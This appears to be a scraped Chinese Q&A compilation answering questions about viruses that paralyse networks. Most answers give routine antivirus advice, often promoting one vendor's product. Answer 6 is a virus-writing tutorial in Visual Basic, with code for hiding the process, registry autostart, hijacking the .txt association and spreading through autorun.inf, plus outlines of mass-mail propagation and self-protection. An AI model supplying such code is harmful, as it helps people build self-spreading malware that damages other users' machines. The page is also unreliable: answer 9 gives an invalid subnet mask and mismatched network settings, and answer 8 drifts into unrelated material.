1. 如何应对计算机病毒攻击所造成的网络瘫痪等问题
赶紧杀毒,就按我下面的操作来
第一,请您先不要着急,只要病毒就有克制的方法。
第二,建议您现在立刻下载腾讯电脑管家“8.0”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。
第三,打开杀毒页面开始查杀,切记要打开小红伞引擎。
第四,如果普通查杀不能解决问题,您可以打开腾讯电脑管家---工具箱---顽固木马专杀- 进行深度扫描。
第五,查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。
2. 电脑中病毒了,机子瘫痪了,怎么办
您好
1,建议您换个杀毒软件试试吧,到电脑管家官网下载一个腾讯电脑管家。
2,然后重启电脑按F8进入带网络的安全模式,因为安全模式下可以彻底查杀复制型病毒母体。
3,进入安全模式后,打开腾讯电脑管家进行全盘查杀即可。
4,查杀完后,最好再用电脑管家的安全体检功能,对电脑做一个全面体检,修复被病毒篡改的系统默认项。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
3. 公司因为个别员工主机中毒,而导致整个网络瘫痪的情况,遇到这个问题怎么解决啊怎么避免啊
首先你是由于个别员工主机中毒了导致整个网络瘫痪,这个情况一般都是中毒计算机发大量的数据包阻塞网络环境(如ARP或者其他数据包),这样就需要确定到底是哪个或者哪些主机在发包导致网络瘫痪,确定这些主机发的包的类型,然后在你的防火墙或者交换机上配置相应的策略(如首先把找到的几台计算机断网,然后查杀病毒,最后在防火墙或者交换机上设置相应的包过滤策略等等)。
具体解决办法:可以用一些抓包的软件进行数据流量分析,在你的服务器上或者交换机(能够支持镜像数据),抓取整个网络中的数据包,通过抓取一段时间进行数据会话分析,把中毒计算机的IP/MAC分析出来再进行相应处理即可,这个国内外也比较多了,但是个人用了一些国外和国内的,国外的是英文版的,操作不是很方便,国内的话,试试科来的网络分析系统,里面的专家诊断功能可以把网络的各个层次的问题都自动诊断出来,包括攻击、性能等方面,比较好用的一款工具。
4. 电脑估计中了什么病毒了,现在每秒64Kb的数据包不停ping网关导致网关几乎瘫痪。
您好:
这样的情况可能是您的电脑中了终结者木马病毒导致的网关几乎瘫痪,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以的哦,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,是完全可以帮助您查杀病毒而且保护您的电脑的哦。
您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:http://..com/c/guanjia/
5. 电脑中病毒瘫痪了啊,高手帮忙啊!
建议你使用同事的电脑或者其他比较安全的电脑去下载机器狗的专杀,解压好了以后,使用U盘在自己的电脑下杀毒。
专杀工具不要拷贝在自己的电脑上,就在U盘里运行,在这之前,请一定关闭U盘的自己播放,不要双击U盘,选择在资源管理器中打开U盘,并运行U盘里的专杀。
在整个过程中, 请一定断开你的网络连接,在使用机器狗专杀杀死机器狗以后,你就可是使用你电脑上的杀毒软件了(机器狗主要破话是还原工具,但它也会破坏你的杀毒软件,所以之前杀你的杀毒软件没有效果)。
在杀死机器狗以后(建议你顺带把AV终结者的专杀一起下了,应为这两个病毒,都有破坏电脑安全软件的作用)。当你杀死他们后,你的安全软件,就能发挥它的作用杀死其他的小木马了, 在确认杀读完全之前,请不要连接到任何网络上。
以后操作建议在安全模式下,运行。。。另外如果你不能进入安全模式,哪么请考虑下载磁盘机的专杀工具。
也就是说,你的杀毒顺序,最好是磁盘机(如果不能进安全模式的话, 考虑有此病毒),然后机器狗和AV终结者-最后是普通病毒。
6. 电脑中毒,网络瘫痪
对于接触计算机的朋友们来说,病毒已经不在是一个陌生的东西。病毒一般都具有传播、隐藏、破
坏等能力。所以自从第一个病毒问世以来,它便被人们视为一种神秘的东西。但是,我们要知道。
病毒也是程序,也是由人写出来的。所以,病毒并不是什么高不可攀的东西。现在,让我们了解一
下VB制作病毒的原理。
首先,病毒是有隐藏性的。如何来实现病毒的隐藏是很多年来的热点话题。我们先不接触什么线程
插入技术。我们要实行自我隐藏,就要用到API函数。其代码如下:
Public Declare Function GetCurrentProcessid Lib "kernel32" () As Long
Public Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As
Long, ByVal dwType As Long)
Public Const RSP_SIMPLE_SERVICE = 1
Public Const RSP_UNREGISTER_SERVICE = 0
Public Sub MakeMeService()
Dim pid As Long
Dim resery As Long
pid = GetCurrentProcessid()
regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
End Sub
这样就实现了自我隐藏。还有别的什么App.Title = ""和App.TaskVisible = False都可以用于VB病
毒的隐藏。
病毒光会隐藏还不行,还要有常驻内存的能力。说通俗点,计算机关闭病毒也就跟着死去,而计算
机重启,病毒也要跟这复活。所以,我们接下来的任务就是:实现病毒的开机自启。
了解病毒的朋友会知道,病毒一般是利用在注册表中插入相应键值来实现开机自启的。所以,我们
就要利用编程来实现着一功能。读写注册表要用到API函数,代码:
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA"
(ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType
As Long, lpData As Any, ByVal cbData As Long) As Long
上述是API声明。病毒的开机自启就是在RUN下建立一个启动项,代码:
Dim hKey As Long
Dim cc
Let cc = Len("病毒的绝对路径")
RegCreateKey HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Runservices", hKey
RegSetValueEx hKey, "键名", 0, REG_SZ, ByVal "病毒的绝对路径", cc
RegCloseKey hKey
以上代码执行后会在注册表中加入一个病毒的启动项。
光利用开机自启来长驻内存也太容易被杀了。所以,我们还要想尽一切办法来让病毒启动。这里介
绍的2种办法。
第一种。修改文本文件的关联。其代码如下:
API声明:
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal
hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String,
ByVal cbData As Long) As Long
Const HKEY_CLASSES_ROOT = &H80000000
Const REG_SZ = 1
实现代码:
Dim sKeyName As String ‘存储键名
Dim sKeyValue As String ‘存储键值
Dim MyReturn As Long ‘存储返回值信息
Dim keyhandle As Long
sKeyName = "Test"
sKeyValue = "Test Application"
MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&(keyhandle&, "", REG_SZ, sKeyValue, 0&)
MsgBox MyReturn&
sKeyName = ".txt" ‘要建立关联的文件后缀名
sKeyValue = "Test"
MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&(keyhandle&, "", REG_SZ, sKeyValue, 0&)
sKeyName = "Test"
sKeyValue = "D:\\病毒.exe %1" ‘自己程序的位置和名称
MyReturn& = RegCreateKey&(HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&(keyhandle&, "shell\open\command", REG_SZ, sKeyValue,
MAX_PATH)
End Sub
以上是利用修改TXT文件关联来实现病毒启动的。
第二种,利用Autorun.inf
光盘就是利用这个来自动播放的,所以我就不废话了。
实现代码:
If Dir("F:\") <> "" Then Let a = App.Path + "\" + App.EXEName + ".exe"
FileCopy a, "C:\病毒.exe"
Open "Autorun.inf" For Output As #1
Print #1, "[autorun]"
Print #1, "OPEN=病毒.exe"
Close #1
这样就实现了双击C盘启动病毒的作用。
下面说一下病毒的传播,病毒的传播可以说是八仙过海。主要的传播方式就是电子邮件传播,远程
溢出等。
远程溢出这里不做详解。第一是我不太熟练,只会用,不会说。第二是要讲清楚很麻烦。所以,我
讲一下电子邮件传播。
首先,建立一个WINSOCKE。然后利用编程来实现。这里只说思路。
ConnectToServer Server, Winsock1 ‘这是向服务器建立连接
SendMail FromAddress, ToAddress, Subject, Body, Winsock1, Attach ‘发送邮件
FromAddress 发件人地址
ToAddress 收件人地址
Subject 邮件标题
Body 邮件内容
Attach 附件地址
利用这样的原理来群发,可以达到传播自己的目的。
还有一种就是U盘/A盘传播,原理上面已经说过。利用Autorun.inf文件,这里就不废话了。
说了这么多,还剩最后一点,那就是破坏性。这个就不详细阐述。什么自动关机,无限增殖。大家
自己发挥想象,这不是很难的事。
最后总结,一个什么样的病毒,它必须生活在特定的操作系统下。所以,病毒做出来后,不一定能
在什么操作系统下都能用。还有一点,病毒必须能自己保护自己。这里推荐使用TIMER。利用这个部
件来不断的写注册表。这样,很难删掉病毒的启动键值。还要保护自身的增殖文件。比如:
Let a = App.Path + "\" + App.EXEName + ".exe"
If Dir("C:\Program Files\病毒.exe") <> "" Then
Else: FileCopy a, "C:\Program Files\病毒.exe"
最后,还有最重要的一点。那就是容错语句。尽量多加。以防万一。
希望可以帮到你
7. 病毒把电脑弄瘫痪了,网断了,杀毒软件瘫了,把杀毒软件一删,网又连上了怎么回事呢在线等
您好:如果怀疑系统存在病毒,建议您安装瑞星杀毒软件V16版本升级到最新病毒库后进行病毒扫描查杀,下载地址:http://pc.rising.com.cn/
8. 如何处理计算机病毒造成的网络信息系统瘫痪等突发故障
故障处理,大概遵循以下几个大的方向。
1、收到报警或定期巡检;
2、检查是否误报;
3、确认报警内容属实进行相应处理;
4、检查是否有预案,如有则按照预案处理,如无则尽快联系厂商处理,同时对此事备案。
在处理问题环节,如果在自身团队无法处理的时候,及时和厂商联系,获取更专业的支持。
对于系统运维来说,不仅仅要关注软件层面的问题以及运维,同时对于基础IT建设也要有一定的了解,最起码要知道出现问题应该找谁解决。随着现阶段技术的发展,不可能做到一个人对所有技术面面俱到,那么在无法解决问题的时候,如何找到解决问题的人,应该是每一个系统运维人员所必须要了解的。
空调故障的问题偶然性很强,但是依然有方法避免,那就是采取硬件服役到一定年限后更换,而不是等它彻底损坏后再更换。但是这种方法会带来很多额外的费用支出,一般来说,在企业中推行这种方法需要IT部门有一个强有力的后盾去支持才能较好的达到预期效果。
还有一点是值得注意的,不管具体是什么故障,做好预案和备案最重要,以防止这种问题再次发生,或者再次发生后,也可以极为快速地去解决问题。
9. 什么病毒会导致网络连接中断
您好
1,有很多病毒会篡改通信协议,都会导致断网,有些ARP欺骗攻击也会导致断网。
2,如果您的电脑经常断网,还可能是存在IP冲突等等。
3,您可以先到腾讯电脑管家官网下载一个电脑管家。
4,打开电脑管家——杀毒——全盘查杀,根据电脑管家提示对病毒做出清理即可。
6,打开网上邻居——查看网络连接——TCPIP协议,将您的IP地址修改为固定IP,这样可能以后您电脑就不会断网了,如果还断的话,可能是线路或者运营商的问题。
P地址:192.168.1.(2-255任意)
子网掩码:225.225.225.0
默认网关:192.168.0.1或者是192.168.1.1
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
10. 几百台电脑中有一台中毒引起网络瘫痪的处理。
您好:
一台中毒的话是有没有可能引起整个网络瘫痪的,毕竟现在可以依靠区域网传播的木马病的已经很多了,建议您使用腾讯电脑管家保护您区域网中的电脑的安全吧,腾讯电脑管家是采用“ 4+1 ”核“芯”杀毒引擎的专业杀毒软件,杀毒防毒能力强,腾讯电脑管家还有清理垃圾、电脑加速、修复漏洞、软件管理、电脑诊所等电脑管理功能,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:http://..com/c/guanjia/